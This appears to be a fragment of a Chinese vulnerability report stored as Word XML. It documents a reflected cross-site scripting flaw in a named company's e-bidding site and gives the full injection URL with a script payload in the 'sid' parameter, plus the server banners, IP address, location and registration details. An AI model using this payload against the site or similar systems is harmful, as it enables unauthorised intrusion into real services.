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注入网址:http://www.ykjtzb.com:8800/ebidding/UserAction.do?sid=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&amp;no_sitemesh=&amp;method=regChannel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:sid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:POST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http://www.ykjtzb.com:8800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Welcome to JBoss&amp;trade;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  山东省济宁市邹城市 联通</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  60.211.234.148</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  5年9月7天（创建于2013年08月10日,过期时间为2021年08月10日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  鲁ICP备10203122号-10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兖矿集团有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2019/3/25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Apache-Coyote/1.1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http://www.ykjtzb.com:8800/ebidding/UserAction.do?sid=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&amp;no_sitemesh=&amp;method=regChannel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ww.ykjtzb.com_88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